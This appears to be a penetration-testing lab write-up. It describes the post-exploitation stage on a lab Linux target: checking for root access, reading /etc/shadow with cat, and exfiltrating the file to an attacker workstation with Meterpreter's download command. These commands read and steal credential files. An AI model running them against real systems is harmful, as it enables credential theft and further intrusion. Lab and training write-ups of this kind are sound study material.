Objective: To leverage administrative access to extract the system’s “Shadow” file, demonstrating the ability to harvest encrypted credentials for offline analysis.

1. The Post-Exploitation Phase

Once the initial shell was established on the target (192.168.56.101), the focus shifted to Data Exfiltration. In Linux environments, the most critical file for an attacker is /etc/shadow, which contains the encrypted password hashes for every user on the system.

2. Technical Challenges & Solutions

During the session, I encountered a platform-specific limitation where the standard Metasploit priv extension (designed for Windows) was unavailable for this Linux target. I successfully adapted by utilizing native Linux commands to bypass the tool’s limitations.

Target FilePermission RequiredData Content
/etc/passwdRead (All Users)Usernames and UID information.
/etc/shadowRoot OnlyEncrypted password hashes and salt.

3. Execution Workflow

  1. Identity Verification: Confirmed administrative status by executing whoami (Result: root).
  2. Bypassing Tool Limitations: Instead of relying on automated “hashdump” scripts, I manually accessed the sensitive file structure.
  3. File Read & Capture: Used the cat command to display the contents of the shadow file directly in the terminal for manual capture.
  4. Secure Download: Utilized the Meterpreter download command to pull the file from the victim’s infrastructure to my local Kali workspace for evidence preservation.

4. Key Commands Used

  • getuid: To verify the current session’s privilege level (User: 0 / Root).
  • cat /etc/shadow: To read the encrypted password store.
  • download /etc/shadow /home/sophy/Desktop/shadow_loot.txt: To exfiltrate the data to a secure local directory.

RESOURCES_NODE_01
Screenshot
Caption: Manual exfiltration of the Linux shadow file, revealing encrypted user credentials.

RESOURCES_NODE_01
Screenshot
Caption: Utilizing Meterpreter’s transport capabilities to securely transfer sensitive data from the target to the attacker’s workstation.

5. Professional Impact

This project highlights a “Pivot-Mindset”—the ability to troubleshoot technical hurdles (like unsupported extensions) and still achieve the objective using core operating system knowledge. By successfully extracting the /etc/shadow file, I demonstrated the final stage of a system compromise: the theft of “Identities,” which could lead to further lateral movement across the entire corporate network.